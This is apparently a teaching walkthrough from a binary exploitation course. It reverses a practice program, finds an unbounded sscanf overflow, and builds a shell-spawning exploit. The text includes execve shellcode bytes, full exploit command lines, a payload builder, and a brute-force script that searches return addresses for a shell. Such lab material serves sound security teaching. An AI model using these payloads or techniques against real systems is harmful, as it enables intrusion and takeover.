18-330 Binary Exploitation Bootcamp

Our goal for this bootcamp is to spawn a shell by exploiting the vuln executable. We assume ASLR is disabled and the stack is executable. Download vuln here.

Reversing

Just as with any other binary exploitation problem, I suggest running the program with different inputs to get a feel for what it is doing. After running vuln a couple of times, we might realize that the program doesn't print anything that hints at its expected usage, so we can move on at this point.

We start by running objdump -d vuln > vuln.asm, which dumps the program's disassembly into the vuln.asm file. Now we open vuln.asm and look at the main function, which starts at address 0x4005ed. I'll copy the contents below:

00000000004005ed <main>:
  4005ed:   55                      push   %rbp
  4005ee:   48 89 e5                mov    %rsp,%rbp
  4005f1:   48 83 ec 50             sub    $0x50,%rsp
  4005f5:   89 7d bc                mov    %edi,-0x44(%rbp)
  4005f8:   48 89 75 b0             mov    %rsi,-0x50(%rbp)
  4005fc:   48 8b 45 b0             mov    -0x50(%rbp),%rax
  400600:   48 83 c0 08             add    $0x8,%rax
  400604:   48 8b 00                mov    (%rax),%rax
  400607:   48 8d 4d c0             lea    -0x40(%rbp),%rcx
  40060b:   48 8d 55 f8             lea    -0x8(%rbp),%rdx
  40060f:   be 10 07 40 00          mov    $0x400710,%esi
  400614:   48 89 c7                mov    %rax,%rdi
  400617:   b8 00 00 00 00          mov    $0x0,%eax
  40061c:   e8 cf fe ff ff          callq  4004f0 <__isoc99_sscanf@plt>
  400621:   89 45 fc                mov    %eax,-0x4(%rbp)
  400624:   83 7d fc 02             cmpl   $0x2,-0x4(%rbp)
  400628:   74 1b                   je     400645 <main+0x58>
  40062a:   8b 45 fc                mov    -0x4(%rbp),%eax
  40062d:   89 c6                   mov    %eax,%esi
  40062f:   bf 16 07 40 00          mov    $0x400716,%edi
  400634:   b8 00 00 00 00          mov    $0x0,%eax
  400639:   e8 82 fe ff ff          callq  4004c0 <printf@plt>
  40063e:   b8 ff ff ff ff          mov    $0xffffffff,%eax
  400643:   eb 2f                   jmp    400674 <main+0x87>
  400645:   eb 14                   jmp    40065b <main+0x6e>
  400647:   8b 45 f8                mov    -0x8(%rbp),%eax
  40064a:   89 c6                   mov    %eax,%esi
  40064c:   bf 30 07 40 00          mov    $0x400730,%edi
  400651:   b8 00 00 00 00          mov    $0x0,%eax
  400656:   e8 65 fe ff ff          callq  4004c0 <printf@plt>
  40065b:   8b 45 f8                mov    -0x8(%rbp),%eax
  40065e:   3d 94 3a 8f 49          cmp    $0x498f3a94,%eax
  400663:   75 e2                   jne    400647 <main+0x5a>
  400665:   bf 54 07 40 00          mov    $0x400754,%edi
  40066a:   e8 41 fe ff ff          callq  4004b0 <puts@plt>
  40066f:   b8 00 00 00 00          mov    $0x0,%eax
  400674:   c9                      leaveq 
  400675:   c3                      retq

So the only library functions main calls are sscanf, printf, and puts. Recall that the first argument to a function is passed in the rdi/edi register. Right before each call to printf, a constant address (a format string stored in the binary) is moved into edi. Since that string is not user controlled, this is probably not meant to be a format string attack on printf.

Since printf appears to be uninteresting to us, let's take a look at sscanf. Before our call to sscanf, we have a lot of stack manipulation, so this would be a good time to create a stack diagram.

This is what I came up with after tracing the assembly code line by line:
==================== stack grows down
  main return addr
-------------------- <- rbp + 0x8
     saved rbp
-------------------- <- rbp - 0x0
 sscanf return val
-------------------- <- rbp - 0x4
  integer variable
-------------------- <- rbp - 0x8

   string buffer

-------------------- <- rbp - 0x40
       argc
-------------------- <- rbp - 0x44
       argv
==================== <- rbp - 0x50

When rip is at 0x40061c (right about to call sscanf), rdi contains argv[1], rsi contains the address of a constant string at 0x400710, rdx contains the address of a 4-byte variable at rbp - 0x8, and rcx contains the address of a buffer at rbp - 0x40.

At this point, we can load the program into gdb and break at 0x40061c (break *0x40061c). When we hit the breakpoint, we can print the string at 0x400710 (x/s 0x400710). It turns out this string is just "%d,%s". So the call corresponds to C code that looks something like this:
int sscanf_return_value = sscanf(argv[1], "%d,%s", &integer_variable, buffer);
Continuing with the assembly, we see that the program compares the return value of sscanf with 2. If it isn't 2, main prints that return value and returns -1.
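To make the return-value check concrete, here is a rough Python 3 model of how the C standard describes parsing "%d,%s". The function name model_sscanf is hypothetical, and the model assumes the C locale and ignores integer overflow; it is a sketch, not glibc's implementation.

```python
import re

# Rough model of sscanf(s, "%d,%s", &n, buf) following the C standard's rules.
# Assumptions: C locale, no integer-overflow handling. Not glibc's actual code.
_INT = re.compile(rb"\s*([+-]?\d+)")   # %d: skip whitespace, read a signed decimal
_WORD = re.compile(rb"\s*(\S+)")        # %s: skip whitespace, read non-whitespace bytes


def model_sscanf(data: bytes):
    """Return (count, n, word) where count mimics sscanf's return value."""
    if not data.strip():
        return -1, None, None          # EOF before the first conversion
    m = _INT.match(data)
    if m is None:
        return 0, None, None           # %d failed: nothing assigned
    n = int(m.group(1))
    if data[m.end():m.end() + 1] != b",":
        return 1, n, None              # literal ',' did not match
    w = _WORD.match(data, m.end() + 1)
    if w is None:
        return 1, n, None              # no bytes left for %s
    # %s has no width limit, so `word` may be far longer than the 0x38-byte buffer
    return 2, n, w.group(1)


print(model_sscanf(b"5,hello"))     # (2, 5, b'hello')
print(model_sscanf(b"hello")[0])    # 0
print(model_sscanf(b"5,AAA BBB"))   # (2, 5, b'AAA')
```

Only input of the form number, comma, non-whitespace makes sscanf return 2, which is what the cmpl $0x2 at 0x400624 requires. The last case also shows that %s stops at the first whitespace byte, so a payload must not contain any.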

Then the program checks whether integer_variable equals 0x498f3a94, which is 1234123412 in decimal. If it doesn't, main enters an infinite loop that keeps printing the integer. Otherwise, the program prints a string with puts, returns from main, and exits normally.
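A quick Python 3 check of the conversion, which also shows the byte order the comparison expects in memory (x86-64 is little-endian, so the least significant byte comes first):

```python
import struct

MAGIC = 0x498F3A94                      # immediate operand of cmp at 0x40065e
print(MAGIC)                            # 1234123412

# These are the 4 bytes that must end up at rbp - 0x8 for the loop to be skipped.
MAGIC_BYTES = struct.pack("<I", MAGIC)
print(MAGIC_BYTES.hex())                # 943a8f49
```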

The vulnerability in this program should be fairly clear: sscanf copies the (user-controlled) argv[1] into a fixed-size buffer, and %s places no limit on how many bytes it writes. Classic buffer overflow!

Designing the Payload

Since there isn't a convenient function in the program that spawns a shell for us, it would be easiest for us to write shellcode into our string buffer and then overwrite the main return address with the address of our buffer.

From our stack diagram, we can visualize the layout of our payload:
("5,") + (0x38 bytes of shellcode) + (1234123412) + (0xC bytes of padding) + (address of buffer)
You might ask yourself why we start with the number 5 instead of 1234123412. The answer is that sscanf writes into the supplied arguments from left to right: it stores the %d value first and only then copies the %s string. If we overflow the string buffer far enough, we end up overwriting the integer variable at rbp - 0x8 anyway, so the first number can be any decimal number. What matters is that 1234123412 appears at the right offset in our string (as the 4 little-endian bytes \x94\x3a\x8f\x49); otherwise main spins in the infinite loop and never reaches its ret instruction.
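The ordering argument can be checked with a toy Python 3 model of main's frame built from the stack diagram. The helper names and the pre-existing return address value 0x00007ffff7a2d830 are made up for illustration; only the offsets come from the diagram.

```python
# Toy model of main's frame; offsets are rbp-relative and taken from the stack diagram.
FRAME_LO = -0x40          # start of the string buffer
FRAME_HI = 0x10           # end of main's saved return address
INT_OFF = -0x08           # integer_variable
RET_OFF = 0x08            # main's return address


def slot(off: int) -> int:
    """Index into the frame bytearray for an rbp-relative offset."""
    return off - FRAME_LO


def run_sscanf_writes(frame: bytearray, n: int, word: bytes) -> None:
    """Apply sscanf's stores in argument order: first %d, then %s.
    %s copies `word` plus a NUL with no bounds check on the 0x38-byte buffer."""
    frame[slot(INT_OFF):slot(INT_OFF) + 4] = (n & 0xFFFFFFFF).to_bytes(4, "little")
    data = word + b"\x00"
    if len(data) > len(frame):
        raise ValueError("payload runs past the modeled region")
    frame[0:len(data)] = data


def read(frame: bytearray, off: int, size: int) -> int:
    return int.from_bytes(frame[slot(off):slot(off) + size], "little")


frame = bytearray(FRAME_HI - FRAME_LO)
# Hypothetical original return address into libc (top two bytes are zero)
frame[slot(RET_OFF):slot(RET_OFF) + 8] = (0x00007FFFF7A2D830).to_bytes(8, "little")

word = (b"A" * 0x38                                     # fills the buffer
        + (0x498F3A94).to_bytes(4, "little")            # lands on integer_variable
        + b"B" * 0xC                                    # sscanf return slot + saved rbp
        + (0x7FFFFFFFDD50).to_bytes(8, "little")[:6])   # low 6 bytes of new return addr

run_sscanf_writes(frame, 5, word)
print(hex(read(frame, INT_OFF, 4)))   # 0x498f3a94, not 5
print(hex(read(frame, RET_OFF, 8)))   # 0x7fffffffdd50
```

Clobbering the sscanf return slot with padding is harmless: right after the call, main stores sscanf's result there anyway (mov %eax,-0x4(%rbp) at 0x400621).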

We can grab some shellcode online, such as this one, which is a 27-byte shellcode string. Since this is shorter than the 0x38 bytes we have allotted for shellcode, we can fill the front of the buffer with NOPs (\x90 bytes), giving a 0x38 - 27 = 29 = 0x1D-byte NOP sled that slides execution into the shellcode.
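Putting the layout together, a Python 3 sketch of a payload builder might look like this. build_payload and the constant names are hypothetical. It also rejects bytes that would cut the payload short, since %s stops at C whitespace and an argv string can't contain a NUL byte.

```python
import struct

# 27-byte execve("/bin/sh") shellcode used in the command below
SHELLCODE = (b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb"
             b"\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05")

BUF_SIZE = 0x38   # rbp - 0x40 .. rbp - 0x8
PAD_SIZE = 0xC    # sscanf return slot (4) + saved rbp (8)
MAGIC = 0x498F3A94
# NUL can't appear inside an argv string, and C whitespace ends the %s copy
BAD_BYTES = set(b"\x00\t\n\v\f\r ")


def build_payload(shellcode: bytes, buf_addr: int) -> bytes:
    """Assemble "5," + NOP sled + shellcode + magic + padding + low 6 address bytes."""
    if len(shellcode) > BUF_SIZE:
        raise ValueError("shellcode does not fit in the buffer")
    ret = struct.pack("<Q", buf_addr)
    if ret[6:] != b"\x00\x00":
        raise ValueError("expected an address whose top two bytes are zero")
    body = (b"\x90" * (BUF_SIZE - len(shellcode)) + shellcode
            + struct.pack("<I", MAGIC) + b"A" * PAD_SIZE + ret[:6])
    bad = sorted(set(body) & BAD_BYTES)
    if bad:
        raise ValueError(f"payload contains bytes that break argv or %s: {bad}")
    return b"5," + body


payload = build_payload(SHELLCODE, 0x7FFFFFFFDD50)
print(BUF_SIZE - len(SHELLCODE))   # 29 (0x1D NOPs)
```

With the buffer address below, it reproduces the argument passed to vuln in the gdb command below byte for byte. To feed it to the program from a shell, write the bytes with sys.stdout.buffer.write(...) rather than print, because Python 3's print would UTF-8-encode bytes such as \x90 as two bytes.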

Now we need the address of the buffer. Recall that when sscanf is called, the rcx register contains the address of the buffer, so we can retrieve it in gdb (break on the sscanf call, then p/x $rcx). On my machine it is 0x7fffffffdd50. This address will be different outside of gdb, but we can keep testing in gdb for now and adjust the address later.

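Now our command with the exploit string looks like this. Only the low 6 bytes of the buffer address are included: the top two bytes are zero and can't be passed through argv, but sscanf's terminating null byte fills the seventh byte and the eighth byte of the original return address is already zero: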
gdb --args ./vuln $(python2 -c "print '5,' + '\x90' * 0x1D + '\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05' + '\x94\x3a\x8f\x49' + 'A' * 12 + '\x50\xdd\xff\xff\xff\x7f'")
When we run this it should work! But...

Debugging the Shellcode

We actually get a SIGILL (illegal instruction) with this. Time to debug!

Throwing it into gdb again, we get an illegal instruction when rip is at 0x7fffffffdd81. This is clearly within our buffer, and stepping through the assembly confirms that we got past all the NOPs. The program executes normally up to 0x7fffffffdd81, which is odd.

If we examine the memory at rip (x/30dx $rip in gdb) right before we reach the offending address, we see that 0x7fffffffdd81 holds opcode 5e, which corresponds to pop rsi. That is a perfectly valid instruction, and gdb decodes it without trouble. However, once execution reaches 0x7fffffffdd81, gdb decodes the bytes there as (bad).

At this point it seems like the stack is being modified as the shellcode executes. We confirm this by printing rsp, which is 0x7fffffffdd90, just above the end of our buffer. After main returns, rsp points just past our payload, so every push in the shellcode writes downward toward the shellcode itself. The instruction right before pop rsi is push rsp, and that push overwrites the very bytes that are about to execute; rsp is simply very unluckily placed.
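The clobbering can be reproduced with a small Python 3 model. The instruction lengths and stack effects are typed in by hand from the shellcode listing (this is not an x86 emulator), and it assumes, per the stack diagram, that rsp ends up at rbp + 0x10 = buffer + 0x50 after leave; ret. The names ORIGINAL, FIXED, and first_clobber are hypothetical, and the exact addresses depend on the buffer address, so they need not match the gdb session above.

```python
# Each entry: (mnemonic, encoded length, change to rsp, writes 8 bytes to [rsp]?)
# Typed in by hand from the shellcode listing; this is not an x86 emulator.
ORIGINAL = [
    ("xor eax, eax", 2, 0, False),
    ("mov rbx, imm64", 10, 0, False),
    ("neg rbx", 3, 0, False),
    ("push rbx", 1, -8, True),
    ("push rsp", 1, -8, True),
    ("pop rdi", 1, +8, False),
    ("cdq", 1, 0, False),
    ("push rdx", 1, -8, True),
    ("push rdi", 1, -8, True),
    ("push rsp", 1, -8, True),
    ("pop rsi", 1, +8, False),
    ("mov al, 0x3b", 2, 0, False),
    ("syscall", 2, 0, False),
]
FIXED = [("sub rsp, 100", 4, -100, False)] + ORIGINAL


def first_clobber(instrs, buf_addr, buf_size=0x38):
    """Return (mnemonic, rsp) for the first push whose 8-byte store overlaps
    shellcode bytes that have not executed yet, or None if none does."""
    end = buf_addr + buf_size                     # shellcode ends where the buffer ends
    rip = end - sum(n for _, n, _, _ in instrs)   # NOP sled runs into the first byte
    rsp = buf_addr + 0x50                         # after leave; ret: rbp + 0x10
    for name, length, delta, is_push in instrs:
        rip += length                             # next instruction to execute
        rsp += delta
        if is_push and rsp < end and rsp + 8 > rip:
            return name, rsp
    return None


print(first_clobber(ORIGINAL, 0x7FFFFFFFDD50)[0])  # push rsp
print(first_clobber(FIXED, 0x7FFFFFFFDD50))         # None
```

In the model, the push rsp right before pop rsi is the first store that lands on unexecuted shellcode, and prepending sub rsp, 100 moves every push below the buffer.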

We can fix this by modifying the shellcode. We copy the shellcode's assembly (found on the same site as before) into a new file, shellcode.asm, and add sub rsp, 100 at the start. This moves rsp 100 bytes down, below the buffer, so the later pushes land in memory we no longer care about. Our shellcode assembly now looks like this:
; shellcode.asm
main:
    sub rsp, 100 
    xor eax, eax 
    mov rbx, 0xFF978CD091969DD1
    neg rbx 
    push rbx 
    push rsp 
    pop rdi 
    cdq 
    push rdx 
    push rdi 
    push rsp 
    pop rsi 
    mov al, 0x3b
    syscall
We assemble this with nasm -felf64 shellcode.asm and then retrieve the opcodes with objdump -d shellcode.o. Our new shellcode ends up being this:
\x48\x83\xec\x64\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05
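Copying bytes out of objdump by hand is error-prone, so a small Python 3 helper can collect them. objdump_to_escaped is a hypothetical name, and the sample input is an abbreviated excerpt in the shape objdump -d prints (column spacing may differ between binutils versions). Long instructions such as the 10-byte mov wrap onto a continuation line that has an address and bytes but no mnemonic, which the pattern also accepts.

```python
import re

# One objdump -d line: "<addr>:<TAB><hex bytes><spaces><TAB><mnemonic>".
# Continuation lines for long instructions carry only the address and bytes.
_LINE = re.compile(r"^\s*[0-9a-f]+:\t((?:[0-9a-f]{2} )*[0-9a-f]{2})")


def objdump_to_escaped(text: str) -> str:
    """Collect the opcode bytes from objdump -d output as a \\x-escaped string."""
    hex_bytes = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if m:
            hex_bytes.extend(m.group(1).split())
    return "".join("\\x" + b for b in hex_bytes)


# Abbreviated sample shaped like objdump -d shellcode.o output (first 3 instructions)
SAMPLE = (
    "0000000000000000 <main>:\n"
    "   0:\t48 83 ec 64          \tsub    $0x64,%rsp\n"
    "   4:\t31 c0                \txor    %eax,%eax\n"
    "   6:\t48 bb d1 9d 96 91 d0 \tmovabs $0xff978cd091969dd1,%rbx\n"
    "   d:\t8c 97 ff \n"
)
print(objdump_to_escaped(SAMPLE))
```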
This is 4 bytes longer than the original shellcode, so we compensate by shortening our NOP sled by 4 bytes (from 0x1D to 0x19). Now this is our final exploit string:
gdb --args ./vuln $(python2 -c "print '5,' + '\x90' * 0x19 + '\x48\x83\xec\x64\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05' + '\x94\x3a\x8f\x49' + 'A' * 12 + '\x50\xdd\xff\xff\xff\x7f'")
Sure enough, it spawns a shell in gdb.

When running this outside of gdb, the buffer address will be different, so we can write a program to loop through return addresses that are near 0x7fffffffdd50 and run it until we get a shell. And that's it!
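One way to write that loop, as a Python 3 sketch: all function names are hypothetical, and it relies on vuln never reading stdin itself, so a spawned /bin/sh will execute the echo PWNED line we pipe in. Candidates step by 0x10, which is smaller than the 0x19-byte NOP sled, so some candidate should land inside the sled if the real buffer address is within the search radius. Addresses whose low 6 bytes contain NUL or whitespace are skipped, since they could not survive argv or %s.

```python
import struct
import subprocess

# Final 31-byte shellcode (with the leading sub rsp, 100) from the text above
SHELLCODE = (b"\x48\x83\xec\x64\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff"
             b"\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05")
NOPS = 0x38 - len(SHELLCODE)                  # 0x19-byte NOP sled
BAD = set(b"\x00\t\n\v\f\r ")                  # bytes that break argv or %s


def payload(addr: int) -> bytes:
    return (b"5," + b"\x90" * NOPS + SHELLCODE + struct.pack("<I", 0x498F3A94)
            + b"A" * 12 + struct.pack("<Q", addr)[:6])


def candidates(center: int, radius: int = 0x400, step: int = 0x10):
    """Yield addresses around `center`, nearest first, skipping ones whose low
    6 bytes contain a bad byte. Keep `step` <= the sled length."""
    for delta in range(0, radius + 1, step):
        for addr in ((center,) if delta == 0 else (center + delta, center - delta)):
            if not (set(struct.pack("<Q", addr)[:6]) & BAD):
                yield addr


def try_address(binary: str, addr: int, timeout: float = 2.0) -> bool:
    """Run the binary once and feed it a command; a spawned shell will echo it."""
    try:
        result = subprocess.run([binary, payload(addr)], input=b"echo PWNED\n",
                                capture_output=True, timeout=timeout)
    except subprocess.TimeoutExpired:
        return False
    return b"PWNED" in result.stdout


def brute_force(binary: str, center: int):
    """Return the first return address that yields a shell, or None."""
    for addr in candidates(center):
        if try_address(binary, addr):
            return addr
    return None
```

Calling brute_force("./vuln", 0x7FFFFFFFDD50) returns the first address that produced a shell, or None. Since environment variables and argv sit at the top of the stack, an address found this way may shift again if the program is launched with a different environment.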

Summary

To sum up, these problems are easiest to solve by drawing a stack diagram first, then identifying the parts of the program most susceptible to attack, and then crafting a payload. In rare cases you might end up debugging the payload itself (though 18-330 assignments should be simple enough that this usually isn't necessary).